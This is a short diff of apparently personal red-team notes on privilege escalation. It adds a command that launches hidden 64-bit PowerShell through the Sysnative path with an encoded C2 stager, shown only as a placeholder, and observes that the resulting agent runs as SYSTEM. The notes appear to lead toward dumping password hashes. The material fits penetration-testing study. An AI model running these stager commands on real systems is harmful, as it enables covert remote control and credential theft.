raghavtalwar/Red-Team-Operations/06 - Privilege Escalation (TA0004)/Dump Hashes with the Elevated Agent.md

 `64-bit (x64) PowerShell is located at %SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe

 Note: We cannot spawn a 64 bit PS from a 32 bit agent.
-To spawn a new process / agent, we can
+To spawn a new process / agent:
+`C:\Windows\Sysnative\WindowsPowerShell\v1.0\powershell.exe -noP -sta -w 1 -enc  <ENCODED_PART_OF_STAGER>`
+- Observe, we now have a new agent that is a 64-bit process running as SYSTEM!

 ![[Pasted image 20240331023805.png]]
 ## Enumeration